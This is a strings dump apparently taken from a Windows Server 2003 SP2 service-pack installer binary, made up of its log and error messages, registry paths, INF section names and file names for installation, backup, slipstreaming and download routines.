Reg spuninst.exe, failed to write SpRecoverCmdLine value, error is 0x%lx
SpRecoverCmdLine
Reg spuninst.exe, failed to open System\Setup key, error is 0x%lx
UnRegisterSpuninstForRecovery, failed to delete SpRecoverCmdLine value, error 0x%lx
UnRegisterSpuninstForRecovery, failed to open reg key, error 0x%lx
RegisterSprecovr, failed to Set BootExecut value, error is 0x%lx
sprecovr \SystemRoot\sprecovr.txt
RegisterSprecovr: failed to copy sprecovr.exe to the system, error is 0x%lx
sprecovr.exe
RegisterSprecovr, Failed to open sprecovr.txt with error 0x%lx
RegisterSprecovr, failed to copy sprecovr.txt, error is 0x%lx
sprecovr.txt
\spuninst\spuninst.txt
BootExecute
RegisterSprecovr, RegOpenKey failed with error 0x%lx.
UnRegisterSprecovr, RegOpenKey failed with error 0x%lx.
ArchiveHighEncryptionFiles: Allocation for CurrentExportEntry failed
*.tmp
updencin.exe /x
ArchiveHighEncryptionFiles: RegCreateKeyEx Failed: 0x%lx
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\EncInst
tsocenc.inf.sav
tsocenc.inf
encinst.inf.sav
encinst.inf
updencts.inf
Could not copy updencts.inf file to Export directory
Could not copy updencin.inf file to Export directory
updencin.inf
Could not copy encinst.exe file to Export directory
updencin.exe
encinst.exe
export
Could not copy rsaenhs.dll file to System32 directory
ArchiveHighEncryptionFiles: Cannot find rsaenhs.dll
rsaenhs.dll
ScanAssimilateDUCallback: File operatation aborted
updatetmp.tmp
ArchiveFilesFromArchiveFilesSections:FindFirstFile for %s Failed: 0x%lx
ArchiveFilesFromArchiveFilesSection: ExConditionalProcessArchiveOperations failed with error 0x%lx.
Tmp.%d.%s
%s\Tmp.%d.%s
sfc.dll
ArchiveQueue: component %s: no target %s
ArchiveQueue: no source component %s
ArchiveQueue: bad path on %s
$winnt$.pnf
RegisterDll: Failed to spawn process; error=0xx
RegisterDll: Exit code=0xx
RegisterDll: Executing command line: %s ...
"%s\regsvr32.exe" /s "%s\%s"
regwizc.dll
ReadStrings: MultiByteToWideChar on SP_TITLE failed with error code %u
Wrong Flags %d in %ws for %ws
Appending %d %d %d %ws %ws
Reg Type Mismatch, old %d, new %d for %ws\%ws
Failed to open/create the key %ws with error 0x%lx
Failed to get RegKey in %ws Error 0x%lx
Exception hit at line %d of %ws, exception = 0x%lx
Failed on line %d in %ws with error 0xlx
Failed on line %d of Field 0 in %ws
Failed on line %d in %ws with error 0xlx
Failed on line %d in %s with error 0xlx
updates.cab
Installing AppPatch section "[%s]".
DoRegistryUpdates: UpdSpInstallFromInfSection failed for %s with error:0x%lx
Deleting existing AppPatch keys.
1,0,2205,0
No apcompat.inf file, AppPatch will not be updated
apcompat.inf
DoRegistryUpdates: ExConditionalProcessRegOperations failed with error 0x%lx.
msimn.exe
msjava.dll
oledb32.dll
DoRegistryUpdates:UpdSpInstallFromInfSection Failed for %s: 0x%lx
ProductInstall.GlobalRegistryChanges.Append
DoRegistryUpdates:UpdSpInstallFromInfSection Failed for %s : 0x%lx
DoRegistryUpdates:UpdSpInstallFromInfSection Failed for %s: 0x%lx
%s.%s
DoRegistryUpdates:UpdSpInstallFromInfSection Failed for %s error: 0x%lx
ProductInstall.GlobalRegistryChanges.Install
ProductInstall.GlobalRegistryChanges.ReInstall
DoNoDelayReplace: Skip on MoveFileEx for %s
DoNoDelayReplaceFailed to copy %s to %s with error 0x%lx
Failed to move %s to %s with error 0x%lx
DeleteOrMoveTarget:Failed to delete the target %s, %d time
DoNoDelayReplace: Atomic replace support not implemented; disabling.
ntdetect.com
NTLSAPI.DLL
LLSSRV.EXE
LLSRPC.DLL
LICCPA.CPL
Changing error code %u (0x%x) to %s (0x%x)
DoInstallation: ExConditionalRunInfProcess failed while durring EXECUTE_ONCANCELORFAIL.
DoInstallation: GetInternalHalFileName for %s failed during repeated inventory : 0x%lx
DoInstallation: ExConditionalRunInfProcess failed while durring EXECUTE_AFTERREBOOT.
DoInstallation: Failed to update updsvc.inf; error=0xlx.
DoInstallation: Unregistering spuninst.exe for recovery successful
DoInstallation: Failed to unregistering spuninst.exe for recovery.
DirectoriesToCleanUp.AfterInstall
DoInstallation: ExConditionalProcessShortcutOperations failed with error 0x%lx.
LinkItems.Create
DoInstallation: ExConditionalRunInfProcess failed while durring EXECUTE_AFTERINSTALL.
ProcessesToRun.Interactive
DoInstallation:RunInfProcesses for %s Failed
DoInstallation:RunInfProcesses for %s Failed
DoInstallation:RunInfProcesses for ProcessesToRun.VM Failed
ProcessesToRun.VM
Num Ticks for Reg update and deleting 0 size files : %d
DoInstallation: RunInfProcesses for %s failed.
Num Ticks for Copying files : %d
DoInstallation: ExConditionalRunInfProcess failed while durring EXECUTE_BEFOREREGOPERATIONS.
DoInstallation: ExConditionalProcessCatalogOperations (CATALOG_OP_DELETE) failed with error 0x%lx.
Error installing assemblies, GLE=%u
DoInstallation: Installing assemblies with source root path: %s
DoInstallation: ApplyHotpatches returned %s.
Registering spuninst.exe for recovery successful.
Registering spuninst.exe for recovery failed.
LastGood.Tmp
AppPatch.Files
DoInstallation:DoDeleteOnCopyOperations failed
Failed to add section %s to security template: error 0x%lx
Failed to copy spupdsvc.exe to system32
spupdsvc.exe
DoInstallation: ExConditionalRunInfProcess failed while durring EXECUTE_BEFOREFILECOPY.
cleanjpm.exe
Num Ticks for creating uninst inf : %d
svcpack1.dll
AppPatch.Save.Reg.For.Uninstall
IIS.Save.Reg.For.Uninstall
DoInstallation: ExConditionalProcessArchiveOperations: ARCHIVE_OP_REG failed with error 0x%lx
Save.Reg.For.Uninstall
Num Ticks for Backup : %d
update\updspapi.dll
Check.For.128.Security
DoInstallation: ExConditionalRunInfProcess failed while durring EXECUTE_BEFOREARCHIVE.
DoInstallation:RunInfProcesses Failed for %s
DoInstallation: Invalid NumInstances: %d
RebootNecessary = %d,WizardInput = %d , DontReboot = %d, ForceRestart = %d
WizShowLastPage failed (%u)
CreateProgressDialog failed (%u)
Num Ticks for Cabinet build : %d
Num Ticks for download : %d
DoInstallation: ApplyAdminSystemAclsRecursive for %s failed; error=0xx
dumpDownloadTask returned 0x%x %s
Num Ticks for invent : %d
Package %s, File %s, Version %s, Branch %s
~rsp~.log
DoInstallation: CreateFile for %s failed: 0x%lx
~req~.log
CreateUninstall = %d,Directory = %s
DoInstallation:UpdSpOpenInfFile for OldUninstallInf file %s not found: 0x%lx
%s\spuninst\spuninst.inf
DoInstallation: GetIndexFilePathIfExist error in function: %d
DoInstallation: FetchSourceURL for %s failed
DoInstallation: Error 0x%lx while evaluating extended conditional section [%s].
ProductInstall.ExtendedConditional
ExtendedConditional.Declare
DoInstallation: SPCacheRoot (%s) directory does not exist, UseCache flag has been reset to 0
SOFTWARE\Classes\conman.exe\DefaultIcon
%s\schannel.dll
End:SnapPendingDelayedRenameOperations
DoInstallation: SnapPendingDelayedRenameOperations failed: 0x%lx
Begin:SnapPendingDelayedRenameOperations
DoInstallation: GetInternalHalFileName for %s Failed: 0x%lx
DoInstallation: ApplyAclInit failed; error=0xx
d:\nt.x86fre\installer\pi_ws03_sp2\update\update\doinst.c
_UPDATE_EXE_QUIET_MODE
ValidateSlipStreamPathsVersion info not present in %s
ValidateSlipStreamPathsVersion info not present in update.inf of SP Package
ValidateSlipStreamPathsVersion Mismatch in %s
ValidateSlipStreamPaths SKU mismatch between paths %s %s\slipstream.inf
ValidateSlipStreamPathsSKU Tag Not found in %s\slipstream.inf
ValidateSlipStreamPathsLanguage Mismatch in %s
ValidateSlipStreamPathsArchitecture Mismatch in %s
Platform string not present in %s
Invalid Inf %s ( 0x%lx )
%s is an invalid slipstream path
slipstream.inf
dosnet.inf
ValidateSlipStreamPathsFile %s not Found ( 0x%lx )
Failed to Delete %s
File %s Deleted
ProductInstall.SlipStreamEx
%s_%d: Delete file %s failed with error %u
Copy of %s to %s hit with error 0x%lx
%s_%d: copy uncompressed file name %s failed with error 0X%x
Source File %s Not Present
%s_%d: Try delete uncompressed file, but cannot find the file, error code: 0X%x
Copy of %s to %s
Source (%s) and Target (%s) are different with respect to compression
CreateSlipStreamExFailed executing %s
Invalid line in %s, Not able to find Dir Section
TagFile %s Not Found in any Paths
Invalid line in %s
CreateSlipStreamExFile %s not Found ( 0x%lx )
%s_%d: cannot get ThisServicePackVersion value from [version] with error 0X%x
%s_%d: %s cannot be opened with error 0x%lx )
%s_%d: failed with error 0X%x
password
passive
reportonly
_UPDATE_EXE_WU_AU_MODE
CabBuild.log
%s_%d: GetUncompressedFileName failed with error 0X%x
%s_%d: IsFileCompressed failed with error 0X%x
%s_%d: copying %s -> %s
copying %s -> %s
copy %s %s -> %s (%s)
%S_%d: Failed. Source file name is too long (longer than %d bytes)
GetGroupIdFromPidGenDll:LoadLibrary failed for %s dll
%s_%d: BINK is %d
GetGroupIdCountFromPidGenDll:LoadLibrary failed for %s dll
hivesys.inf
x86CheckSlipStreamDestination: Invalid handle for file: %s
GetVersionInfoFromDosnet: UpdSpOpenInfFile failed to open file: %s
GetProductType: UpdSpOpenInfFile failed to open file: %s
CheckOSVersion: UpdSpOpenInfFile failed to open file: %s
GetLanguageFromUpdate: UpdSpOpenInfFile failed to open file: %s
GetLanguageFromHivesys: UpdSpOpenInfFile failed to open file: %s
REGDMP_HKEY_TMP\ControlSet001\Services\setupdd
REGDMP_HKEY_TMP
setupreg.hiv
tmpreg.hiv
%s_%d: Cannot determine correct build type from pidgen. Reverting to Generic.
pidgen.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\WindowsFeatures
Windows Media Services
%s_%d: failed to get offline image's spLevel with error 0X%x
%s_%d: StringCchPrintf failed with error code 0X%x
win51%s*
%s_%d: noop for OS %d.%d
%s_%d: Failed. CopyFilesToTarget from %s to %s returned 0X%x
%s_%d: failed to copy target file name and path with error 0X%x
%s_%d: failed to copy source file name and path with error 0X%x
%s_%d: Missing source file %s
%s_%d: copied %s to %s
Deleting %s
ServicePackFilesDelete.files
CreateSlipstream:FileCopy Failure for file: %s
*.cat
ServicePackFilesAlways.files
CreateSlipstream: InfProductBuildType=%s
ServicePackFiles.BuildType.KNEval.Files
ServicePackFiles.BuildType.KNSel.Files
ServicePackFiles.BuildType.Mnt.Files
ServicePackFiles.BuildType.Evl.Files
ServicePackFiles.BuildType.Sel.Files
ServicePackFiles.BuildType.Selx64pro.Files
ServicePackFiles.BuildType.IB.Files
ServicePackFiles.BuildType.WinSB.Files
ServicePackFiles.BuildType.IL.Files
ServicePackFiles.BuildType.IC.Files
ServicePackFiles.BuildType.IW.Files
ServicePackFiles.BuildType.ID.Files
ServicePackFiles.BuildType.IA.Files
ServicePackFiles.BuildType.KNIA.Files
ServicePackFiles.BuildType.IS.Files
ServicePackFiles.BuildType.KNIS.Files
ServicePackFiles.BuildType.IP.Files
%s_%d: WARNING: Failed to get build type.
CreateSlipstream(%s,%s,%s)
%s_%d: find a integrated hotfix for higher service pack
%s_%d: MultiByteToWideChar failed with error: %d
%s_%d: Find file %s failed with error: %d
svcpack\*.cat
%s_%d: failed to get offline image's spLevel with error 0x%x
%s_%d: media has no integrated hotfixes (%s is not found).
%s_%d: failed to build a file path string for svcpack.inf with error 0X%x
%s\svcpack.inf
AnalyzePhaseZero used %u ticks
AnalyzeForBranching used %u ticks.
AnalyzeForBranching: files installed on target workstation are from %s branch which is incompatible with %s branch
AnalyzeForBranching: Package required to migrate %s not found
AnalyzeForBranching: g_bMigrate set to TRUE because target file %s has branch %s which is smaller than branch for %s
AnalyzeForBranching: g_bRepeatInventory set to TRUE because target file %s has branch %s which is greater than branch for %s
AnalyzeForBranching: Getting file version for file %s failed with error 0xx
AnalyzeForBranching: Using effective target %s for %s
AnalyzeForHotpatching used %u ticks.
AnalyzeForHotpatching: Hotpatch target added; source=%s,target=%s.
AnalyzeForHotpatching: Analyzing source=%s,target=%s...
AnalyzePhaseTwo used %u ticks
AnalyzePhaseThree used %u ticks
AnalyzePhaseSix used %u ticks
Missing file %s
Unable to copy existing clone "%s" to "%s", GLE=0x%lx
AnalyzePhaseSeven used %u ticks
ScanReferenceDirectory used %u ticks
Scanning reference directory "%s"%s
Unable to copy source clone "%s" to "%s", GLE=0x%lx
Source clone %s was found.
ScanReferenceCabinet used %u ticks
$CABREF$.TMP
Scanning reference cabinet "%s"
ScanReferenceSetupSource used %u ticks
$CMPREF$.TMP
Scanning reference setup source "%s"%s
Free space of directory %s adjusted to %I64u
Allocation size of drive %c: adjusted to %u
Allocation size of drive %c: is %u bytes, free space = %I64u bytes
hal.dll
InfContainsCatalogFileKey:SetupQueryInfOriginalFileInformation Failed with error: 0x%lx
InfContainsCatalogFileKey:SetupGetInfInformation Failed with error: 0x%lx
Third Party Provider = %s for %ws
AnalyzePhaseFive used %u ticks
GetDiskUsageInfo:AddDiskUsageInfo failed to add space to drive containing %s file
In-box driver %ws is signed by oem catalog %s.
Oem driver %ws is signed by %s and will not be replaced
SetupDiGetDriverInfoDetail in CollectThirdPartyDriversFromDevice Failed with error: %d
SetupDiCallClassInstaller in CollectThirdPartyDriversFromDevice Failed with error: %d
Found %s in %s
DEVICEID.EXCLUSIONS
SetupDiSetSelectedDriver in CollectThirdPartyDriversFromDevice Failed with error: %d
SetupDiBuildDriverInfoList in CollectThirdPartyDriversFromDevice Failed with error: %d
SetupDiGetDeviceInstallParams in CollectThirdPartyDriversFromDevice Failed with error: %d
Failed to get the TargetSection Path of %s (error 0x%lx )
CheckDeviceNodes: component %s: no target found %s
CheckDeviceNodes: No source component found for %s
CmTargetNodeFlags for %s are 0x%lx
CmTargetNodeFlags modifed for %s are 0x%lx,
%s\%s
AnalyzeDevices used %u ticks
Failed to enumerate %s error( 0x%lx )
Enumerating Devices of %s, GUID %s
AnalyzeCachedSourceFiles used %u ticks
AnalyzeCachedSourceFiles: returns 0X%x
AnalyzeCachedSourceFiles:StringCbCopy effective file name failed, 0X%x
AnalyzeCachedSourceFiles: Use cached source file %s for Source %s
AnalyzeCachedSourceFiles: Source %s version is not valid
AnalyzeCachedSourceFiles: SPCache file %s does not exist
AnalyzeCachedSourceFiles: PFRGetFileVersionEx return %u
EffectiveFileName %s
AnalyzeCachedSourceFiles: don't need to copy %s
AnalyzeCachedSourceFiles: Initialized %s's EffectiveFileName to %s
PROVIDER.EXCLUSIONS
OEMDriver.Exclusions
AnalyzePhaseOne: used %u ticks
%s is in the list of oem drivers...skipping copy!
OEM file scan used %u ticks
bPatchMode = %s
Downloading %u files
AnalyzeComponents used %u ticks
AnalyzeComponents: Branch %s is not applicable to target workstation
AnalyzeComponents: Hotpatching is %s.
hXXp://
/isapi/pstream3.dll/
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
LoadWininet:GetProcAddress Failed for %s: 0x%lx
LoadWininet:LoadLibrary for wininet.dll failed
wininet.dll
InventoryQueueCallback:Not enough Memory to create component target for %s file
InventoryQueueCallback:Not enough Memory to create component file for %s file
ProtectedPatchDownloadCallback:Callback function failed with error %d
FixTimeStampOnCompressedFile : Invalid handle value for file %s
Wininet.InternetConnect failed with error: 0x%lx
Wininet.HttpOpenRequest failed with error: 0x%lx
HttpSendRequest unsuccessful (%u)
HttpSendRequest failed %u
HttpQuery status code failed %u
InternetErrorDlg password prompt for HTTP %u cancelled by user
InternetErrorDlg password prompt for HTTP %u failed %u
HttpSendRequest status %u but not allowed to prompt for credentials
InternetErrorDlg NO_UI for HTTP %u failed %u
HttpSendRequest returned HTTP status %u %s
update.exe
ConnectAndSendRequest:Invalid name for Source URL
ProcessDownloadChunk: WriteFile into %s file failed with error: 0x%lx
ProcessDownloadChunk: CreateFile for %s file failed (%u)
Apply IPD failed: %s on %s to get %s, GLE=%u
Apply failed: MyUpdSpDecompressOfCopyFile(%s,%s)
Apply failed: %s on null to get %s
Apply failed: %s on %s to get %s
Unable to recover %s from reference cabinet %s
Unable to identify patch candidate for %s
AddSourceURL:Allocation failure for Url
Software\Microsoft\Windows NT Service Pack
FetchSourceURL: Memalloc failure for pszSUSSourceFile
_SFX_NoDefaultURL
_SFX_SourceFilesURL
DownloadAndPatchFiles: loading of Wininet support failed
SessionId:%u
Software\Microsoft\Windows NT\CurrentVersion\ServicePack
Max download retries exceeded, GLE=0xX
Failed DownloadAndPatchFiles, GLE=0xX
Calling DownloadAndPatchFiles for %u files
LoadIPDHints: %s <- %s would form a cycle; ignored
LoadIPDHints: source component file %s has no signature
LoadIPDHints: No source component file %s
LoadIPDHints: No target component file %s
Inventory complete: ReturnStatus=%u, %u ticks
InventoryThread: IncludeDirectoryIdFromInf failed during update.inf reload process
InventoryThread: SetQueuedDirectoryIds failed during update.inf reload process
InventoryThread: ExConditionalProcessCatalogOperations failed with error 0x%lx.
Version: %s
FileName: %s
Reading file key: %s
EnumRegKey: Key: %s SubKey: %s
Blocklist: s Suggested fix %s
Blocklist: s Max Version is %s, 6I64X
Blocklist: s Min Version is %s, 6I64X
BlockList INF Configuration: %s
No %s file.
updtblk.inf
BlockListInitialize: Type %s.
Enumerating files: %s
%s\%s\Filelist
%s %-14s %s
Enumerating fixes: %s
Enumerating SPs: %s
FileIsBlocked: File s version 6I64X is blocked from installation
Failed to allocate memory for %u entires.
Error getting find handle for %s
FindFirstFile %s
Invalid file format: %s
Failed to open %s
MarkHotfixesForMigration: Failed to get hash for target %s; Error=0xx
MoveFile(%s, %s) failed %u
Rename failed. Destination path %s exists.
Rename failed. Source path %s does not exist.
MigrateHotfix: Hotfix %s successfully migrated
RegSetValueEx(%s) failed %i
Update.exe failed %u.
SpawnProcessAndWaitForItToComplete failed %u
Migrating QFE %s with command line: update.exe -Z -Q -B:%s
update\update.exe -Z -Q -O -B:
QFE %s has no backup directory to migrate.
MigrateHotfix: Migrating hotfix %s
MigrateHotfixes: Return code: %u
MigrateHotfixes: Migration of %s failed
SetEnvironmentVariable(_HFM_EXE_PATH, %s) failed %u
UdpStopService: ControlService failed :0x%lx
UdpStopService: OpenService failed :0x%lx
UdpStopService: OpenSCManager failed :0x%lx
SOFTWARE\Microsoft\Updates\UpdateExeVolatile
setupapi.dll
%u.u:
%s: malloc pUserSid failed
%s: GetTokenInformation for TokenUser failed: 0x%lx
%s: malloc for TokenUser failed
%s: TokenUser Sid is big than %d bytes
%s: malloc pOwnerSid failed
%s: GetTokenInformation for TokenOwner failed: 0x%lx
%s: malloc for TokenOwner failed
%s: TokenOwner Sid is big than %d bytes
%s: OpenProcessToken failed: 0x%lx
%s: AllocateAndInitializeSid failed: 0x%lx
%s: malloc pBuf failed
GetFileVersion of %s resulted in exception %d
GetInternalFilename of %s resulted in exception %d
\StringFileInfo\xx\
System\CurrentControlSet\Control\Windows
Failed to Open the CSDVersion Key error: 0x%lx
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
wintrust.dll
rsaenh.dll
%s\%s.asms
kernel32.dll
End: RunInfProcesses->%s
Return Code = %u
RunInfProcesses: SpawnProcessAndWaitForItToComplete on "%s" in [%s] failed: 0x%lx
RunInfProcesses: SpawnProcessAndWaitForItToComplete on "*" in [%s] failed: 0x%lx
Working directory: %s
Starting process: %s
Ignoring the proccess %s
Begin: RunInfProcesses->%s
IsFileExists(): Exception hit for %s ( error = 0xlx )
Failed Deleting %s %u
Failed To Set LKG Key
Message displayed to the user: %s
CustomizeCall:GetProcAddress for %s failed: 0x%lx
GetFileSecurity failed with error 0x%lx for file %s
0123456789
FindOrMountSystemPartition: System partion is now mounted as drive %c.
FindOrMountSystemPartition: System partion already mounted as drive %c.
FindOrMountSystemPartition: RegOpenKeyEx failed; error=0x%lx.
SetAltOsLoaderPath: RegOpenKeyEx failed; error=0x%lx.
Failed To Write %s error 0xlx
%s = %s
seed obtained from session key
Failed to open the Signing Key with error 0x%lx
Class install of %s failed with error 0xlx
Starting install of the Class %s
Class Dll --> %s of %s is not copied. Skipping Device install class
ProductInstall.ClassInfsToInstallAlways
ProductInstall.ClassInfsToInstallIfExist
WM_QUERYENDSESSION: %s
WM_ENDSESSION: %s
Failed to create windows 0xlx
%s: SetupGetLineText failed: 0x%lx
%s: %s is not in update.inf
Software\Microsoft\Windows NT\CurrentVersion
SYSTEM\CurrentControlSet\Control\Windows
Failed to open the Setup Key 0x%lx
ProcessDynamicStrings: Operation type not found.
ProcessDynamicStrings: %s is not a supported operation
ProcessDynamicStrings: Insufficient parameters for InstallPathEnvVar operation.
ProcessDynamicStrings: Key not found for operation %s.
ProcessDynamicStrings: UpdSpSetDynamicString failed on %s to %s: 0x%lx
ProcessDynamicStrings: all %%%s%% replaced with %s.
ProcessDynamicStrings: InstallPathEnvVar failed to find environment variable %s
ProcessDynamicStrings: ExpandEnvironmentStrings failed on %s: 0x%lx
ProcessDynamicStrings: InstallPathEnvVar for %s returned %s
ProcessDynamicStrings: Insufficient parameters for InstallPathRegistryKey operation.
ProcessDynamicStrings: InstallPathRegistryKey for %s,%s failed
ProcessDynamicStrings: InstallPathRegistryKey for %s,%s returned %s
ProcessDynamicStrings: RegOpenKeyEx failed: 0x%lx
ProcessDynamicStrings: InstallPathRegistryKey failed to process unsupported data type: 0x%lx
ProcessDynamicStrings: Insufficient parameters for CustomStringTable operation.
ProcessDynamicStrings: CustomStringTable for %s failed to find the string.
ProcessDynamicStrings: CustomStringTable for %s returned %s
ProcessDynamicStrings: Insufficient parameters for CustomFunction operation.
ProcessDynamicStrings: LoadLibrary for %s failed: 0x%lx
ProcessDynamicStrings: GetProcAddress for %s failed: 0x%lx
ProcessDynamicStrings: CustomFunction for %s returned %s
DeRegistering the Uninstall Program -> %s, %d
TurnOffSfc: Leave issued; file=%s, line=%d, LastError=0x%lx
d:\nt.x86fre\installer\pi_ws03_sp2\update\splib\common.c
%s_%d: failed copy string with error 0X%x
%s_%d: more than one file in single file cab: %s.
%s_%d: failed to get string length with error 0X%x
GetCatVersion: Failed to retrieve version information from %S with error 0x%lx
GetCatVersion: %S has version of 0, this may indicate error converting version string.
%s: Invaild registry hive %s for query %s, %s.
%s: Error creating buffer for expanding value %s, %s, %s.
%s: Error expanding value %s, %s, %s.
%s: Error extracting %s, %s, %s, 0x%1x.
%s: Unable to allocate memory of size %d for query %s, %s, %s.
%s: Unable to read %s, %s, %s, 0x%1x.
%s: Unable to open %s, %s, 0x%1x.
AppPatch.Exclusions
File not found %s
Unable to open the File %s ( error 0x%lx )
_d_.tmp.dll
DeleteOrMoveTargetInternal: targetfile is %s
CopyNTLDR: targetfile is %s
gdi32.DLL
Clusapi.DLL
Advapi32.DLL
SXS.DLL
kernel32.DLL
newdev.dll
CryptHashPublicKeyInfo
crypt32.dll
psapi.dll
Cabinet.dll
Failed To Create Link -3 %s
@.lnk
Failed To Create Link -2 %s
Failed To Create Link -1 %s
ValidateSingleFileSignature(): Exception hit for %s ( error = 0xlx )
UpdateExeVolatile_AppendSystemTime: NtQuerySystemInformation failed: 0x%lx
UpdateExeVolatile_AppendSystemTime: StringCbPrintf failed: 0x%lx
%s_6I64X
UpdateSpUpdSvcInf: Failed to write temp inf "%s"; error=0xlx.
UpdateSpUpdSvcInf: Failed to copy "%s" -> "%s"; error=0xlx.
UpdateSpUpdSvcInf: Failed to open target inf "%s"; error=0xlx.
UpdateSpUpdSvcInf: Failed to open temp inf "%s"; error=0xlx.
spupdsvc.inf
UpdateSpUpdSvcInf: Source [%s] section is empty; nothing to do.
Signature="$Windows NT$"
Return values from CM_Get_DevNode_Status %d problem = %d
UpgradeDevice for %s resulted in exception 0xlx
Failed to install device %s with error code 0x%lx
Starting Upgrade For %s from %s
Starting Backup For %s
%s.%d.old
setupapi.log
StringCbCopy Failed with error 0x%lx ( %s )
%s_%d: GetModuleFileName failed with error 0X%x
%s_%d: StringCchCopy failed with error 0X%x
%s_%d: failed to get parent directory of update.exe, return 0X%x
%s_%d: failed to get current directory of update.exe, return 0X%x
MyGetFileVersion of %s resulted in exception %d
InstallCatalogFile: InstallCatalog failed for %s; error=0xlx.
InstallCatalogFile: VerifyCatalogFile failed for %s; error=0xlx.
DeleteCatalogFile %s failed with ERROR %d
InstallInfCatalogFile: Installing %s as %s...
_d_.cat
InstallCatalogFile: Missing CatalogFile key in Version section of %s; nothing to do.
InstallInfCatalogFile: Error opening %s; error=0xlx.
Policy restored to %d
Policy Changed From %d to %d
InstallSingleCatalogFile: MyVerifyCatalogFile failed for %s; error=0xlx.
InstallSingleCatalogFile: MyInstallCatalog failed for %s; error=0xlx.
PFE2: SVCPACK1.DLL not found; Not avoiding Per File Exceptions.
PFE2: Failed to copy SVCPACK1.DLL; error=0x%lx.
SVCPACK1.DLL
SFC.DLL
%s (version %u.%u.%u.%u)
u/u/u u:u:u.u (local)
%s.%u.log
Not able to find %s in the package
InitializeSvcPackLogWrapper: Unable to write to user-supplied log path: %s
Exception hit In the ComputeValue() for Op %d
%s is Present
%s is Not Present
Exception hit In the CustomFunction() %s
%s returned value( 0x%lx ) which is %ws 0x%lx
%s returned %d
Return Value From %s = %d
%s is not Present in %ws
Exception hit In the ExecuteMsiOperand() for Op %d in %ws
Component path for %ws is %ws (not exe or dll)
Component %ws is not installed ( %d)
Not able to Load msi.dll
msi.dll
Exec %ws: Input Int Value for key %ws Error = 0x%lx
Exec %ws: Input value not Found ( 7th Field ) for Key %ws
Exec %ws: Types don't match of Key %ws
Exec %ws: Wrong Op in 6 th Field of Key %ws
Exec %ws: Result ValueName %ws Not Found For Key %ws
Exec %ws: Result %ws Key Not Found
InternalFileName of %s is %ws %s
InternalFileName of %s is %ws %s
File %s Not Found
Syntax Error in %ws unknown operand ( %ws )
Wrong syntax in Line %d of %ws
Syntax: Wrong Op Name in line %d of %ws
Unexpected Error While Executing Line %d ( %ws ) of %ws
Condition Check for Line %d of %ws returned FALSE
Syntax: Probelm in %d
Condition succeeded for section %ws in Line %d of %ws
\\.\WMIDataDevice
%d:%s
FileInUse:: application: %s was listed in the excludes list and has a file in use - reboot required
FileInUse:: service: %s was listed in the excludes list and has a file in use - reboot required
FileInUse:: Add to list - Application Name: %s PID: %i Image Name: %s
FileInUse:: Application detected - PID: %i Image Name: %s Friendly Name: %s
FileInUse:: Added to SystemExcludes list: %s
FileInUse:: Added to UserExcludes list: %s
FileInUse:: Added to Filelist: %s
InitFileInUseDetection: No DelayFile %s; reboot will be required.
FlieInUse::%s long image name %s, (> %d char)
FileInUse:: IsTaskUsingModule: Process name: %s, module to search %s
FileInUse:: Add to list - Service Name: %s
FileInUse:: Add to list - Service Name: %s ImageName: %s
%s::StringCchCopy failed with error 0x%lx
FileInUse:: PrintTasksUsingModule: No tasks found using %s
Failed to open the device %ws Depth %d
Unisntall the device %ws at Depth %d
Uninstall the Device %ws at Depth %d
Unable to locate the Device ID %d 0x%lx
Failed to set SPDRP_CONFIGFLAGS of %s error (0x%lx )
Failed to get SPDRP_CONFIGFLAGS of %s error (0x%lx )
Reinstall the device %s
Restarted Device %s
Device Removol of %s was vetoed by %s ( veto type %u )
CM_Locate_DevNode_ExW of %s failed with error 0x%lx
Unable to insert the Parent Dev Id %s into Restart List
Unable to locate the Parent Device of %s ( Id = 0x%lx ) ( error %d )
Unable to find the Parent DevNode of %s ( error = 0x%lx )
WriteSecuritySection: Failed, line too long at section [%s]
"%s",%d,"%s"
[Registry Keys]
Failed to Write the Key %ws
Size of Key %ws is %d Greater than 1024
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
Failed To Get Windows Dir 0x%lx
%s\Temp
Failed MultiByteToWideChar for %s with error 0x%lx
[FilesToKeep] %s Not Found
Failed to copy from %s to %s
ReportingFlags
[%s] Masking error code %x, and returning STATUS_RETRY_SELF_CONTAINED
susdl.req
[%s] SUS_SHARED access exception 0x%x
[%s] SUS_SHARED version mismatch (%u expecting %u)
SaveAs=%s
%s: Insufficient memory allocating candidate info for %s
[%s] This candidateInfo entry is corrupt. Signature: %s
%s:Inventory candidate %u = %s, 0x%x
[%s] getListIntoCandidateInfoArray: To be extracted from cabinet %s, path in cab: %s
[%s] This candidateInfo entry maybe corrupt. Signature: %s
[%s] Insufficient memory allocating candidate info for %s
[%s] Returning 0x%x
[%s] bad_alloc exception (constructing Inidata?)
[%s] encountered exception: 0x%u
[%s] We have all necessary files for the package to install. Return STATUS_READY_TO_INSTALL
[%s] Error writing to request file to patch %s
[%s] Request to download fallback for %s, size = %u
[%s] Request to download delta for %s, size = %u, basis = %s
[%s] RequestFile %s construction failed. 0x%x
[%s] Error Initializing request file %s
%s\%s.blob
[%s] Alloc failure in RequestFile %s construction.
[%s] Patch for the required file %s is missing. Abort.
[%s] Source:%s, target = %s. CopyFile failed, even after creating the path. Maybe CreateDirectory failed
[%s] Failed copying backup file %s from %s, since we are out of disk space. Abort
[%s] Successfully extracted %s from %s. Path inside cab: %s
[%s] Failed SetFileAttributes for %s, error %d. Ignore and continue.
[%s] ERROR extracting %s from %s. Path inside cab: %s. Error: 0x%x. Will go for Fallback
[%s] Failed extraction of backup file %s from cabinet %s, since we are out of disk space. Abort
[%s] Backup Patch candidate %s to %s
[%s] ConstructFilePathInSandBox error (0x%x)
[%s] Error 0x%x returned from getBestPatchCandidatesForFile( %s )
[%s] Update.exe posting request file to download a total of %u bytes (%u bytes in patches and %u bytes in fallbacks)
[%s]returned 0x%x
[%s] Processing binary %s...
[%s] Error Unmapping previous view of file. 0x%x
[%s] MapViewOfFile error 0x%x mapping view for %s
[%s] CreateFileMapping error 0x%x mapping %s
[%s] GetFileSize error 0x%x, File: %s
[%s] CreateFile error 0x%x opening %s
[%s] fields were empty
[%s] Response file %s is not found (%u)
[%s] returning STATUS_READY_TO_INSTALL
[%s] request file posted, STATUS_MORE_FILES_FOR_DOWNLOAD
[%s] MoveFile failed to move %s to %s: 0x%x
[%s] RequestFiles %s and %s are not equivalant.
[%s] Last 3 req files seem equivalant. No point retrying. Return STATUS_RETRY_SELF_CONTAINED
